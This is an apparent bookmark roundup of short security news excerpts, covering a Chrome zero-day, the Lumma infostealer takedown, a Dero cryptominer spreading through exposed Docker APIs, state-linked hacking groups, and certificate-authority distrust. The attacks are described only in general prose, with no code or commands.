Google on Monday released a fresh Chrome 137 update to address three vulnerabilities, including a high-severity bug exploited in the wild. Tracked as CVE-2025-5419, the zero-day is described as an out-of-bounds read and write issue in the V8 JavaScript engine. “Google is aware that an exploit for CVE-2025-5419 exists in the wild,” the internet giant’s advisory reads. No further details on the security defect or the exploit have been provided. However, the company credited Clement Lecigne and Benoît Sevens of Google Threat Analysis Group (TAG) for reporting the issue. TAG researchers previously reported multiple vulnerabilities exploited by commercial surveillance software vendors, including such bugs in Chrome. Flaws in Google’s browser are often exploited by spyware vendors and CVE-2025-5419 could be no different. According to a NIST advisory, the exploited zero-day “allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page”. It should be noted that the exploitation of out-of-bounds defects often leads to arbitrary code execution. The latest browser update also addresses CVE-2025-5068, a medium-severity use-after-free in Blink that earned the reporting researcher a $1,000 bug bounty. No reward will be handed out for the zero-day. The latest Chrome iteration is now rolling out as version 137.0.7151.68/.69 for Windows and macOS, and as version 137.0.7151.68 for Linux.
·securityweek.com·
Announcing a new strategic collaboration to bring clarity to threat actor naming | Microsoft Security Blog
Microsoft and CrowdStrike are teaming up to create alignment across our individual threat actor taxonomies to help security professionals connect insights faster. In today’s cyberthreat landscape, even seconds of delay can mean the difference between stopping a cyberattack or falling victim to ransomware. One major cause of delayed response is understanding threat actor attribution, which is often slowed by inaccurate or incomplete data as well as inconsistencies in naming across platforms. This, in turn, can reduce confidence, complicate analysis, and delay response. As outlined in the National Institute of Standards and Technology’s (NIST) guidance on threat sharing (SP 800-150), aligning how we describe and categorize cyberthreats can improve understanding, coordination, and overall security posture. That’s why we are excited to announce that Microsoft and CrowdStrike are teaming up to create alignment across our individual threat actor taxonomies. By mapping where our knowledge of these actors aligns, we will provide security professionals with the ability to connect insights faster and make decisions with greater confidence. Names are how we make sense of the threat landscape and organize insights into known or likely cyberattacker behaviors. At Microsoft, we’ve published our own threat actor naming taxonomy to help researchers and defenders identify, share, and act on our threat intelligence, which is informed by the 84 trillion threat signals that we process daily. But the same actor that Microsoft refers to as Midnight Blizzard might be referred to as Cozy Bear, APT29, or UNC2452 by another vendor. Our mutual customers are always looking for clarity. Aligning the known commonalities among these actor names directly with peers helps to provide greater clarity and gives defenders a clearer path to action.
Introducing a collaborative reference guide to threat actors
Microsoft and CrowdStrike are publishing the first version of our joint threat actor mapping. It includes:
* A list of common actors tracked by Microsoft and CrowdStrike mapped by their respective taxonomies.
* Corresponding aliases from each group’s taxonomy.
This reference guide serves as a starting point, a way to translate across naming systems so defenders can work faster and more efficiently, especially in environments where insights from multiple vendors are in play. This reference guide helps to:
* Improve confidence in threat actor identification.
* Streamline correlation across platforms and reports.
* Accelerate defender action in the face of active cyberthreats.
This effort is not about creating a single naming standard. Rather, it’s meant to help our customers and the broader security community align intelligence more easily, respond faster, and stay ahead of threat actors.
·microsoft.com·
50,000+ Azure AD Users Exposed via Unsecured API: BeVigil Uncovers Critical Flaw | CloudSEK
An unsecured API endpoint buried inside a JavaScript file gave attackers the keys to the kingdom—direct access to sensitive Microsoft Graph data of thousands of employees, including top executives. CloudSEK’s BeVigil platform uncovered how this silent slip could lead to identity theft, phishing attacks, and regulatory nightmares. Here’s how it unfolded—and what your organization must do to stay safe. CloudSEK’s BeVigil platform recently identified a critical security lapse on a publicly accessible subdomain of an aviation giant. The vulnerability stemmed from an exposed JavaScript file that contained an unauthenticated API endpoint. This endpoint granted access tokens to Microsoft Graph with elevated privileges, ultimately leading to unauthorized exposure of sensitive data belonging to more than 50,000 Azure AD users.
What Went Wrong
BeVigil’s API Scanner found that a JavaScript bundle on the subdomain included a hardcoded endpoint that was being accessed without authentication. This endpoint issued a Microsoft Graph API token with excessive permissions, specifically User.Read.All and AccessReview.Read.All. These permissions are typically restricted due to their ability to access full user profiles and critical identity governance data. Using this token, an attacker could query Microsoft Graph endpoints to retrieve detailed employee information, including names, job titles, contact details, reporting structures, and even access review configurations. Such exposure not only undermines user privacy but also opens the door to privilege escalation, identity theft, and targeted phishing campaigns, especially since executive-level data was also exposed.
Scale and Severity
The impact is far-reaching. Data associated with over 50,000 users was accessible, and the endpoint continued to return records for newly added users. Among the exposed information were personal identifiers, user principal names, access role assignments, and other governance details. An exposure of this magnitude significantly increases the organization’s attack surface and introduces compliance risks under frameworks such as GDPR and CCPA.
Security and Compliance Implications
* Unauthorized Data Access: Attackers could exploit the API to retrieve confidential employee records directly from Azure AD.
* Token Misuse: The leaked token could grant unrestricted visibility into internal directory structures and governance decisions.
[Figure: snapshot of the generated authorization token]
* Executive Exposure: The data of senior leadership was accessible, making them high-value targets for impersonation or social engineering.
* Regulatory Violations: The exposure of personally identifiable information without proper safeguards raises serious compliance concerns. Data breaches erode user trust and can lead to long-term reputational harm and operational disruption.
Recommended Remediations
BeVigil recommended that the following actions be implemented as a priority:
* Disable Public API Access: Restrict the vulnerable endpoint and enforce strict authentication controls.
* Revoke Compromised Tokens: Invalidate exposed tokens and rotate affected credentials.
* Enforce Least Privilege: Review and limit token scopes to only what is necessary.
* Monitor API Usage: Implement logging and alerting to detect abnormal Microsoft Graph activity.
* Secure Front-End Code: Avoid embedding sensitive endpoints or token logic in client-side scripts.
* Review Permissions and Roles: Audit all Azure AD roles and access reviews to eliminate overprovisioned permissions.
* Implement Rate Limiting: Protect API endpoints with rate controls and anomaly detection.
·cloudsek.com·
Official Root Cause Analysis (RCA) for SentinelOne Global Service Interruption
On May 29, 2025, SentinelOne experienced a global service disruption affecting multiple customer-facing services. During this period, customer endpoints remained protected, but security teams were unable to access the management console and related services, which significantly impacted their ability to manage their security operations and access important data. We apologize for the disruption caused by this service interruption. The root cause of the disruption was a software flaw in an infrastructure control system that removed critical network routes, causing widespread loss of network connectivity within the SentinelOne platform. It was not a security-related event. The majority of SentinelOne services experienced full or partial downtime due to this sudden loss of network connectivity to critical components in all regions. We’d like to assure our commercial customers that their endpoints were protected throughout the duration of the service disruption and that no SentinelOne security data was lost during the event. Protected endpoint systems themselves did not experience downtime due to this incident. A core design principle of the SentinelOne architecture is to ensure protection and prevention capabilities continue uninterrupted without constant cloud connectivity or human dependency for detection and response – even in the case of service interruptions, of any kind, including events like this one.
·sentinelone.com·
CVE-2025-32756: Fortinet RCE Exploited in the Wild
On May 13, 2025, FortiGuard Labs published an advisory detailing CVE-2025-32756, which affects a variety of Fortinet products: FortiCamera, FortiMail, FortiNDR, FortiRecorder and FortiVoice. In their advisory, FortiGuard Labs states that Fortinet has observed this issue being exploited in the wild. The next day, May 14, the vulnerability was added to the CISA KEV catalog. The vulnerability is described in the advisory as a stack-based buffer overflow in the administrative API that can lead to unauthenticated remote code execution. Given that it’s being exploited in the wild, we figured we’d take a closer look. If you’d rather run the test instead of reading this write-up, coverage is already available in NodeZero.
·horizon3.ai·
Hidden Bear: The GRU hackers of Russia’s most notorious kill squad
Russian GRU Unit 29155 is best known for its long list of murder and sabotage ops, which include the Salisbury poisonings in England, arms depot explosions in Czechia, and an attempted coup d’etat in Montenegro. But its activities in cyberspace remained in the shadows — until now. After reviewing a trove of hidden data, The Insider can report that the Kremlin’s most notorious black ops squad also fielded a team of hackers — one that attempted to destabilize Ukraine in the months before Russia’s full-scale invasion. For members of Russia’s most notorious black ops unit, they look like children. Even their photographs on the FBI’s “wanted” poster show a group of spies born around the time Vladimir Putin came to power in Russia. But then, hacking is a young man’s business. In August 2024, the U.S. Justice Department indicted Vladislav Borovkov, Denis Denisenko, Dmitriy Goloshubov, Nikolay Korchagin, Amin Stigal and Yuriy Denisov for conducting “large-scale cyber operations to harm computer systems in Ukraine prior to the 2022 Russian invasion,” using malware to wipe data from systems connected to Ukraine’s critical infrastructure, emergency services, even its agricultural industry, and masking their efforts as plausibly deniable acts of “ransomware” – digital blackmail. Their campaign was codenamed “WhisperGate.” The hackers posted the personal medical data, criminal records, and car registrations of untold numbers of Ukrainians. The hackers also probed computer networks “associated with twenty-six NATO member countries, searching for potential vulnerabilities” and, in October 2022, gained unauthorized access to computers linked to Poland’s transportation sector, which was vital for the inflow and outflow of millions of Ukrainians – and for the transfer of crucial Western weapons systems to Kyiv. 
More newsworthy than the superseding indictment of this sextet of hackers was the organization they worked for: Unit 29155 of Russia’s Main Intelligence Directorate of the General Staff, or GRU. In the past decade and a half, this elite team of operatives has been responsible for the Novichok poisonings of Russian ex-spy Sergei Skripal and Bulgarian arms manufacturer Emilian Gebrev, an abortive coup in Montenegro, and a series of explosions of arms and ammunition depots in Bulgaria and Czechia. Unit 29155 is Russia’s kill and sabotage squad. But now they were being implicated for the first time as state hackers. Moreover, the U.S. government made a compelling case that Unit 29155 was engaged in cyber attacks designed to destabilize Ukraine in advance of Russian tanks and soldiers stealing across the border – if this were true, it would mean that at least one formidable arm of Russian military intelligence knew about a war that other Russian special services were famously kept in the dark about. This hypothesis is consistent with prior findings by The Insider showing that members of 29155 were deployed into Ukraine a few days before the full-scale invasion.
·theins.press·
Google Online Security Blog: Sustaining Digital Certificate Security - Upcoming Changes to the Chrome Root Store
Note: Google Chrome communicated its removal of default trust of Chunghwa Telecom and Netlock in the public forum on May 30, 2025. The Chrome Root Program Policy states that Certification Authority (CA) certificates included in the Chrome Root Store must provide value to Chrome end users that exceeds the risk of their continued inclusion. It also describes many of the factors we consider significant when CA Owners disclose and respond to incidents. When things don’t go right, we expect CA Owners to commit to meaningful and demonstrable change resulting in evidenced continuous improvement. Chrome’s confidence in the reliability of Chunghwa Telecom and Netlock as CA Owners included in the Chrome Root Store has diminished due to patterns of concerning behavior observed over the past year. These patterns represent a loss of integrity and fall short of expectations, eroding trust in these CA Owners as publicly-trusted certificate issuers trusted by default in Chrome. To safeguard Chrome’s users, and preserve the integrity of the Chrome Root Store, we are taking the following action.
Upcoming change in Chrome 139 and higher: Transport Layer Security (TLS) server authentication certificates validating to the following root CA certificates whose earliest Signed Certificate Timestamp (SCT) is dated after July 31, 2025 11:59:59 PM UTC, will no longer be trusted by default.
* OU=ePKI Root Certification Authority,O=Chunghwa Telecom Co., Ltd.,C=TW
* CN=HiPKI Root CA - G1,O=Chunghwa Telecom Co., Ltd.,C=TW
* CN=NetLock Arany (Class Gold) Főtanúsítvány,OU=Tanúsítványkiadók (Certification Services),O=NetLock Kft.,L=Budapest,C=HU
TLS server authentication certificates validating to the above set of roots whose earliest SCT is on or before July 31, 2025 11:59:59 PM UTC, will be unaffected by this change. This approach attempts to minimize disruption to existing subscribers using a previously announced Chrome feature to remove default trust based on the SCTs in certificates.
·security.googleblog.com·
Lumma Infostealer – Down but Not Out?
Key Findings:
* The takedown achieved a significant disruption to Lumma infostealer’s infrastructure, but likely didn’t permanently affect most of its Russia-hosted infrastructure.
* Lumma’s developers are undertaking significant efforts to reinstate the activity and to conduct business as usual.
* There seems to be significant reputational damage to the Lumma infostealer, and the key factor for the infostealer to resume regular activity will be the reputational factors (rather than the technological).
On May 21, 2025, Europol, FBI, and Microsoft, in collaboration with other public and private sector partners, announced an operation to dismantle the activity of the Lumma infostealer. The malware, considered to be one of the most prolific infostealers, is distributed through a malware-as-a-service model. In addition to its use by common cyber criminals for stealing credentials, Lumma was observed to be part of the arsenal of several prominent threat actor groups, including Scattered Spider, Angry Likho, and CoralRaider.
The Takedown on the Dark Web
According to the reports, the takedown operation began on May 15. On that day, Lumma customers flooded dark web forums that advertise the stealer, complaining they were unable to access the malware’s command and control (C2) servers and management dashboards.
·blog.checkpoint.com·
The hottest new vibe coding startup Lovable is a sitting duck for hackers
Lovable is accused of failing to fix security flaws that exposed information about users, a growing vulnerability as vibe coding’s popularity surges. Lovable, the popular vibe coding app that describes itself as the fastest-growing company in Europe, has failed to fix a critical security flaw, despite being notified about it months ago, according to a new report by an employee at a competitor. The service offered by Lovable, a Swedish startup that bills its product as “the last piece of software,” allows customers without any technical training to instantly create websites and apps using only natural language prompts. The employee at AI coding assistant company Replit who wrote the report, reviewed by Semafor, says he and a colleague scanned 1,645 Lovable-created web apps that were featured on the company’s site. Of those, 170 allowed anyone to access information about the site’s users, including names, email addresses, financial information and secret API keys for AI services that would allow would-be hackers to run up charges billed to Lovable’s customers. The vulnerability, which was made public on the National Vulnerability Database on Thursday, highlights a growing security problem as artificial intelligence allows anyone to become a software developer. Each new app or website created by novices is a potential sitting duck for hackers with automated tools that target everything connected to the internet. The advent of amateur vibe coding raises new questions about who is responsible for securing consumer products in an era where developers with zero security know-how can build them.
·semafor.com·
Dero miner spreads inside containerized Linux environments | Securelist
Imagine a container zombie outbreak where a single infected container scans the internet for an exposed Docker API, and “bites” (exploits) it by creating new malicious containers and compromising the running ones, thus transforming them into new “zombies” that will mine for Dero currency and continue “biting” new victims. No command-and-control server is required for the delivery, just an exponentially growing number of victims that are automatically infecting new ones. That’s exactly what the new Dero mining campaign does. During a recent compromise assessment project, we detected a number of running containers with malicious activities. Some of the containers were previously recognized, while others were not. After forensically analyzing the containers, we confirmed that a threat actor was able to gain initial access to a running containerized infrastructure by exploiting an insecurely published Docker API. This led to the running containers being compromised and new ones being created not only to hijack the victim’s resources for cryptocurrency mining but also to launch external attacks to propagate to other networks. The diagram below describes the attack vector: The entire attack vector is automated via two malware implants: the previously unknown propagation malware nginx and the Dero crypto miner. Both samples are written in Golang and packed with UPX. Kaspersky products detect these malicious implants with the following verdicts: nginx: Trojan.Linux.Agent.gen; Dero crypto miner: RiskTool.Linux.Miner.gen.
nginx: the propagation malware
This malware is responsible for maintaining the persistence of the crypto miner and its further propagation to external systems. This implant is designed to minimize interaction with the operator and does not require a delivery C2 server. nginx ensures that the malware spreads as long as there are users insecurely publishing their Docker APIs on the internet.
The malware is named “nginx” to masquerade as the well-known legitimate nginx web server software in an attempt to evade detection by users and security tools. In this post, we’ll refer to this malware as “nginx”. After unpacking the nginx malware, we parsed the metadata of the Go binary and were able to determine the location of the Go source code file at compilation time: “/root/shuju/docker2375/nginx.go”.
·securelist.com·
Czech Republic says China behind cyberattack on ministry, embassy rejects accusations | Reuters
The Czech Republic on Wednesday accused China of being responsible for a "malicious cyber campaign" targeting a network used for unclassified communication at its Foreign Affairs ministry, but China rejected the accusations. China's embassy in Prague called on the Czech side to end its "microphone diplomacy". The attacks started during the country's 2022 EU presidency and were perpetrated by the cyber espionage group APT31, the Czech government said in a statement. The Czech Republic, an EU state and NATO member, said APT31 was publicly associated with the Chinese Ministry of State Security. Foreign Minister Jan Lipavsky said that after the attack was detected, the ministry implemented a new communications system with enhanced security in 2024. "I summoned the Chinese ambassador to make clear that such hostile actions have serious consequences for our bilateral relations," he said. Lipavsky said the attacks centered on email and other documents and focused on information concerning Asia. "The Government of the Czech Republic strongly condemns this malicious cyber campaign against its critical infrastructure," the government said in its statement. China's embassy in the Czech Republic expressed "strong concern and decisive disagreement" with the Czech accusations.
·reuters.com·
New Russia-affiliated actor Void Blizzard targets critical sectors for espionage
Microsoft Threat Intelligence has discovered a cluster of worldwide cloud abuse activity conducted by a threat actor we track as Void Blizzard, who we assess with high confidence is Russia-affiliated and has been active since at least April 2024. Void Blizzard’s cyberespionage operations tend to be highly targeted at specific organizations of interest to Russia, including in government, defense, transportation, media, non-governmental organizations (NGOs), and healthcare sectors primarily in Europe and North America.
·microsoft.com·